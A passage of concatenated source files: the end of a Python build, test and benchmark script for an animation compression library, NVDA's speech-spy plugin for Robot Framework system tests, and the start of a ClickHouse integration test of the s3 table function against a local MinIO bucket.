ctest_cmd = 'ctest --output-on-failure --parallel {}'.format(args.num_threads)
if platform.system() == 'Windows' or platform.system() == 'Darwin':
ctest_cmd += ' -C {}'.format(args.config)
if args.tests_matching:
ctest_cmd += ' --tests-regex {}'.format(args.tests_matching)
result = subprocess.call(ctest_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests(build_dir, args):
print('Running unit tests ...')
if args.compiler == 'android':
do_tests_android(build_dir, args)
else:
do_tests_cmake(args)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
def do_prepare_regression_test_data(test_data_dir, args):
print('Preparing regression test data ...')
current_test_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_test_data))
# Validate that our regression test data is present
if not os.path.exists(current_test_data_zip):
print('Regression test data not found: {}'.format(current_test_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
needs_decompression = not os.path.exists(current_test_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_test_data_zip))
with zipfile.ZipFile(current_test_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
regression_clips = []
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
if len(regression_clips) == 0:
print('No regression clips found')
sys.exit(1)
print('Found {} regression clips'.format(len(regression_clips)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
if len(test_configs) == 0:
print('No regression configurations found')
sys.exit(1)
print('Found {} regression configurations'.format(len(test_configs)))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Write our metadata file
with open(os.path.join(current_test_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename, _ in test_configs:
print('\t"{}"'.format(os.path.relpath(config_filename, test_config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename, _ in regression_clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_test_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_test_data_dir
def do_prepare_decompression_test_data(test_data_dir, args):
print('Preparing decompression test data ...')
current_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_decomp_data))
# Validate that our regression test data is present
if not os.path.exists(current_data_zip):
print('Decompression test data not found: {}'.format(current_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
needs_decompression = not os.path.exists(current_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_data_zip))
with zipfile.ZipFile(current_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
clips = []
for (dirpath, dirnames, filenames) in os.walk(current_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
clips.append(clip_filename)
if len(clips) == 0:
print('No decompression clips found')
sys.exit(1)
print('Found {} decompression clips'.format(len(clips)))
# Write our metadata file
with open(os.path.join(current_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('clip_dir = "{}"'.format(current_data_dir), file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename in clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_data_dir
def do_regression_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'regression_tester_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.regression_tests/com.acl.regression_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_regression_tests_cmake(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run regression tests')
sys.exit(1)
import queue
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
regression_clips = []
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Iterate over every clip and configuration and perform the regression testing
for config_filename, _ in test_configs:
print('Performing regression tests for configuration: {}'.format(os.path.basename(config_filename)))
regression_start_time = time.perf_counter()
cmd_queue = queue.Queue()
completed_queue = queue.Queue()
failed_queue = queue.Queue()
failure_lock = threading.Lock()
for clip_filename, _ in regression_clips:
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
else:
cmd = '"{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((clip_filename, cmd))
# Add a marker to terminate the threads
for i in range(args.num_threads):
cmd_queue.put(None)
def run_clip_regression_test(cmd_queue, completed_queue, failed_queue, failure_lock):
while True:
entry = cmd_queue.get()
if entry is None:
return
(clip_filename, cmd) = entry
result = subprocess.call(cmd, shell=True)
if result != 0:
failed_queue.put((clip_filename, cmd))
failure_lock.acquire()
print('Failed to run regression test for clip: {}'.format(clip_filename))
print(cmd)
failure_lock.release()
completed_queue.put(clip_filename)
threads = [ threading.Thread(target = run_clip_regression_test, args = (cmd_queue, completed_queue, failed_queue, failure_lock)) for _i in range(args.num_threads) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(regression_clips), 'Testing clips:', '{} / {}'.format(0, len(regression_clips)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = completed_queue.qsize()
print_progress(num_processed, len(regression_clips), 'Testing clips:', '{} / {}'.format(num_processed, len(regression_clips)))
all_threads_done = True
for thread in threads:
if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
regression_testing_failed = not failed_queue.empty()
regression_end_time = time.perf_counter()
print('Done in {}'.format(format_elapsed_time(regression_end_time - regression_start_time)))
if regression_testing_failed:
sys.exit(1)
def do_regression_tests(build_dir, test_data_dir, args):
print('Running regression tests ...')
if args.compiler == 'android':
do_regression_tests_android(build_dir, args)
else:
do_regression_tests_cmake(test_data_dir, args)
def do_run_bench_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'acl_decompressor', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.decompressor/com.acl.decompressor.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_pull_bench_android(build_dir):
# Grab the android directory we wrote the results to
output = str(subprocess.check_output('adb logcat -s acl -e "Benchmark results will be written to:" -m 1 -d'))
matches = re.search('Benchmark results will be written to: ([/\.\w]+)', output)
if matches == None:
print('Failed to find Android source directory from ADB')
android_src_dir = '/storage/emulated/0/Android/data/com.acl.decompressor/files'
print('{} will be used instead'.format(android_src_dir))
else:
android_src_dir = matches.group(1)
# Grab the benchmark results from the android device
dst_filename = os.path.join(build_dir, 'benchmark_results.json')
src_filename = '{}/benchmark_results.json'.format(android_src_dir)
cmd = 'adb pull "{}" "{}"'.format(src_filename, dst_filename)
os.system(cmd)
def do_run_bench_native(build_dir, test_data_dir):
if platform.system() == 'Windows':
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor.exe')
else:
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor')
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
metadata_filename = os.path.join(current_data_dir, 'metadata.sjson')
benchmark_output_filename = os.path.join(build_dir, 'benchmark_results.json')
bench_cmd = '{} -metadata="{}" --benchmark_out={} --benchmark_out_format=json'.format(bench_exe, metadata_filename, benchmark_output_filename)
result = subprocess.call(bench_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_run_bench(build_dir, test_data_dir, args):
if args.compiler == 'ios':
return # Not supported on iOS
print('Running benchmark ...')
if args.compiler == 'android':
do_run_bench_android(build_dir, args)
else:
do_run_bench_native(build_dir, test_data_dir)
if __name__ == "__main__":
args = parse_argv()
build_dir = os.path.join(os.getcwd(), 'build')
test_data_dir = os.path.join(os.getcwd(), 'test_data')
cmake_script_dir = os.path.join(os.getcwd(), 'cmake')
is_clean_requested = args.clean or args.clean_only
if is_clean_requested and os.path.exists(build_dir):
print('Cleaning previous build ...')
shutil.rmtree(build_dir)
if args.clean_only:
sys.exit(0)
if not os.path.exists(build_dir):
os.makedirs(build_dir)
os.chdir(build_dir)
print('Using config: {}'.format(args.config))
print('Using cpu: {}'.format(args.cpu))
if args.compiler:
print('Using compiler: {}'.format(args.compiler))
print('Using {} threads'.format(args.num_threads))
regression_data_dir = do_prepare_regression_test_data(test_data_dir, args)
decomp_data_dir = do_prepare_decompression_test_data(test_data_dir, args)
do_generate_solution(build_dir, cmake_script_dir, regression_data_dir, decomp_data_dir, args)
if args.build:
do_build(args)
if args.convert:
do_convert(test_data_dir, args)
if args.unit_test:
do_tests(build_dir, args)
if args.regression_test and not args.compiler == 'ios':
do_regression_tests(build_dir, test_data_dir, args)
if args.run_bench:
do_run_bench(build_dir, test_data_dir, args)
if args.pull_bench:
do_pull_bench_android(build_dir)
sys.exit(0)
|
speechSpyGlobalPlugin.py
|
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2018 NV Access Limited
# This file may be used under the terms of the GNU General Public License, version 2 or later.
# For more details see: https://www.gnu.org/licenses/gpl-2.0.html
"""This module provides an NVDA global plugin which creates a and robot library remote server.
It allows tests to get information out of NVDA.
It is copied into the (system test specific) NVDA profile directory. It becomes the '__init__.py' file as part
of a package.
"""
import typing
from typing import Optional
import globalPluginHandler
import threading
from .blockUntilConditionMet import _blockUntilConditionMet
from logHandler import log
from time import perf_counter as _timer
from keyboardHandler import KeyboardInputGesture
import inputCore
import queueHandler
import watchdog
import sys
import os
def _importRobotRemoteServer() -> typing.Type:
log.debug(f"before path mod: {sys.path}")
# Get the path to the top of the package
TOP_DIR = os.path.abspath(os.path.dirname(__file__))
# imports that require libraries not distributed with an install of NVDA
sys.path.append(os.path.join(TOP_DIR, "libs"))
log.debug(f"after path mod: {sys.path}")
from robotremoteserver import RobotRemoteServer
return RobotRemoteServer
class NVDASpyLib:
""" Robot Framework Library to spy on NVDA during system tests.
Used to determine if NVDA has finished starting, and various ways of getting speech output.
All public methods are part of the Robot Library
"""
SPEECH_HAS_FINISHED_SECONDS: float = 0.5
def __init__(self):
# speech cache is ordered temporally, oldest at low indexes, most recent at highest index.
self._nvdaSpeech_requiresLock = [ # requires thread locking before read/write
[""], # initialise with an empty string, this allows for access via [-1]. This is equiv to no speech.
]
self._lastSpeechTime_requiresLock = _timer()
#: Lock to protect members written in _onNvdaSpeech.
self._speechLock = threading.RLock()
self._isNvdaStartupComplete = False
self._allSpeechStartIndex = self.get_last_speech_index()
self._maxKeywordDuration = 30
self._registerWithExtensionPoints()
def _registerWithExtensionPoints(self):
from core import postNvdaStartup
postNvdaStartup.register(self._onNvdaStartupComplete)
# This file (`speechSpyGlobalPlugin.py`) is moved to
# "scratchpad/globalPlugins/speechSpyGlobalPlugin/__init__.py"
# Import path must be valid after `speechSpySynthDriver.py` is moved to "scratchpad/synthDrivers/"
from synthDrivers.speechSpySynthDriver import post_speech
post_speech.register(self._onNvdaSpeech)
# callbacks for extension points
def _onNvdaStartupComplete(self):
self._isNvdaStartupComplete = True
def _onNvdaSpeech(self, speechSequence=None):
if not speechSequence:
return
with self._speechLock:
self._lastSpeechTime_requiresLock = _timer()
self._nvdaSpeech_requiresLock.append(speechSequence)
@staticmethod
def _getJoinedBaseStringsFromCommands(speechCommandArray) -> str:
baseStrings = [c for c in speechCommandArray if isinstance(c, str)]
return ''.join(baseStrings).strip()
def _getSpeechAtIndex(self, speechIndex):
with self._speechLock:
return self._getJoinedBaseStringsFromCommands(self._nvdaSpeech_requiresLock[speechIndex])
def get_speech_at_index_until_now(self, speechIndex: int) -> str:
""" All speech from (and including) the index until now.
@param speechIndex:
@return: The speech joined together, see L{_getJoinedBaseStringsFromCommands}
"""
with self._speechLock:
speechCommands = [
self._getJoinedBaseStringsFromCommands(x) for x in self._nvdaSpeech_requiresLock[speechIndex:]
]
return "\n".join(x for x in speechCommands if x and not x.isspace())
def get_last_speech_index(self) -> int:
with self._speechLock:
return len(self._nvdaSpeech_requiresLock) - 1
def _getIndexOfSpeech(self, speech, searchAfterIndex: Optional[int] = None):
if searchAfterIndex is None:
firstIndexToCheck = 0
else:
firstIndexToCheck = 1 + searchAfterIndex
with self._speechLock:
for index, commands in enumerate(self._nvdaSpeech_requiresLock[firstIndexToCheck:]):
index = index + firstIndexToCheck
baseStrings = [c.strip() for c in commands if isinstance(c, str)]
if any(speech in x for x in baseStrings):
return index
return -1
def _hasSpeechFinished(self, speechStartedIndex: Optional[int] = None):
with self._speechLock:
started = speechStartedIndex is None or speechStartedIndex < self.get_next_speech_index()
finished = self.SPEECH_HAS_FINISHED_SECONDS < _timer() - self._lastSpeechTime_requiresLock
return started and finished
def _devInfoToLog(self):
import api
obj = api.getNavigatorObject()
if hasattr(obj, "devInfo"):
log.info("Developer info for navigator object:\n%s" % "\n".join(obj.devInfo))
else:
log.info("No developer info for navigator object")
def dump_speech_to_log(self):
log.debug("dump_speech_to_log.")
with self._speechLock:
try:
self._devInfoToLog()
except Exception:
log.error("Unable to log dev info")
try:
log.debug(f"All speech:\n{repr(self._nvdaSpeech_requiresLock)}")
except Exception:
log.error("Unable to log speech")
def _minTimeout(self, timeout: float) -> float:
"""Helper to get the minimum value, the timeout passed in, or self._maxKeywordDuration"""
return min(timeout, self._maxKeywordDuration)
def init_max_keyword_duration(self, maxSeconds: float):
"""This should only be called once, immediately after importing the library.
@param maxSeconds: Should match the 'timeout' value given to the `robot.libraries.Remote` instance. If
this value is greater than the value for the `robot.libraries.Remote` instance it may mean that the test
is failed, and NVDA is never exited, requiring manual intervention.
Should be set to a large value like '30' (seconds).
"""
self._maxKeywordDuration = maxSeconds - 1
def wait_for_NVDA_startup_to_complete(self):
_blockUntilConditionMet(
getValue=lambda: self._isNvdaStartupComplete,
giveUpAfterSeconds=self._minTimeout(10),
errorMessage="Unable to connect to nvdaSpy",
)
if self._isNvdaStartupComplete:
self.reset_all_speech_index()
def get_last_speech(self) -> str:
return self._getSpeechAtIndex(-1)
def get_all_speech(self) -> str:
return self.get_speech_at_index_until_now(self._allSpeechStartIndex)
def reset_all_speech_index(self) -> int:
self._allSpeechStartIndex = self.get_last_speech_index()
return self._allSpeechStartIndex
def get_next_speech_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_speech_index() + 1
def wait_for_specific_speech(
self,
speech: str,
afterIndex: Optional[int] = None,
maxWaitSeconds: int = 5,
) -> int:
"""
@param speech: The speech to expect.
@param afterIndex: The speech should come after this index. The index is exclusive.
@param maxWaitSeconds: The amount of time to wait in seconds.
@return: the index of the speech.
"""
success, speechIndex = _blockUntilConditionMet(
getValue=lambda: self._getIndexOfSpeech(speech, afterIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
shouldStopEvaluator=lambda indexFound: indexFound >= (afterIndex if afterIndex else 0),
intervalBetweenSeconds=0.1,
errorMessage=None
)
if not success:
self.dump_speech_to_log()
raise AssertionError(
"Specific speech did not occur before timeout: {}\n"
"See NVDA log for dump of all speech.".format(speech)
)
return speechIndex
def wait_for_speech_to_finish(
self,
maxWaitSeconds=5.0,
speechStartedIndex: Optional[int] = None
):
_blockUntilConditionMet(
getValue=lambda: self._hasSpeechFinished(speechStartedIndex=speechStartedIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage="Speech did not finish before timeout"
)
def emulateKeyPress(self, kbIdentifier: str, blockUntilProcessed=True):
"""
Emulates a key press using NVDA's input gesture framework.
The key press will either result in a script being executed, or the key being sent on to the OS.
By default this method will block until any script resulting from this key has been executed,
and the NVDA core has again gone back to sleep.
@param kbIdentifier: an NVDA keyboard gesture identifier.
0 or more modifier keys followed by a main key, all separated by a plus (+) symbol.
E.g. control+shift+downArrow.
See vkCodes.py in the NVDA source directory for valid key names.
"""
gesture = KeyboardInputGesture.fromName(kbIdentifier)
inputCore.manager.emulateGesture(gesture)
if blockUntilProcessed:
# Emulating may have queued a script or events.
# Insert our own function into the queue after, and wait for that to be also executed.
queueProcessed = set()
def _setQueueProcessed():
nonlocal queueProcessed
queueProcessed = True
queueHandler.queueFunction(queueHandler.eventQueue, _setQueueProcessed)
_blockUntilConditionMet(
getValue=lambda: queueProcessed,
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for key to be processed",
)
# We know that by now the core will have woken up and processed the scripts, events and our own function.
# Wait for the core to go to sleep,
# Which means there is no more things the core is currently processing.
_blockUntilConditionMet(
getValue=lambda: watchdog.isCoreAsleep(),
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for core to sleep again",
)
class SystemTestSpyServer(globalPluginHandler.GlobalPlugin):
def __init__(self):
super().__init__()
self._server = None
self._start()
def _start(self):
log.debug("SystemTestSpyServer started")
spyLibrary = NVDASpyLib() # spies on NVDA
RobotRemoteServer = _importRobotRemoteServer()
server = self._server = RobotRemoteServer(
spyLibrary, # provides library behaviour
port=8270, # default:8270 is `registered by IANA` for remote server usage. Two ASCII values, RF.
serve=False # we want to start this serving on another thread so as not to block.
)
log.debug("Server address: {}".format(server.server_address))
server_thread = threading.Thread(target=server.serve)
server_thread.start()
def terminate(self):
log.debug("Terminating the SystemTestSpyServer")
self._server.stop()
GlobalPlugin = SystemTestSpyServer
GlobalPlugin.__gestures = {
}
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance, get_instances_dir
from helpers.network import PartitionManager
from helpers.test_tools import exec_query_with_retry
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/dummy/configs/config.d/defaultS3.xml'.format(get_instances_dir()))
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml", "configs/named_collections.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values settings s3_truncate_on_insert=1 {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
def test_partition_by(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
partition_by = "column3"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test_45.csv")
filename = "test2_{_partition_id}.csv"
instance.query(f"create table p ({table_format}) engine=S3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV') partition by column3")
instance.query(f"insert into p values {values}")
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test2_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test2_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test2_45.csv")
def test_partition_by_string_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "col_num UInt32, col_str String"
partition_by = "col_str"
values = "(1, 'foo/bar'), (3, 'йцук'), (78, '你好')"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert '1,"foo/bar"\n' == get_s3_file_content(started_cluster, bucket, "test_foo/bar.csv")
assert '3,"йцук"\n' == get_s3_file_content(started_cluster, bucket, "test_йцук.csv")
assert '78,"你好"\n' == get_s3_file_content(started_cluster, bucket, "test_你好.csv")
def test_partition_by_const_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
partition_by = "'88'"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert values_csv == get_s3_file_content(started_cluster, bucket, "test_88.csv")
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
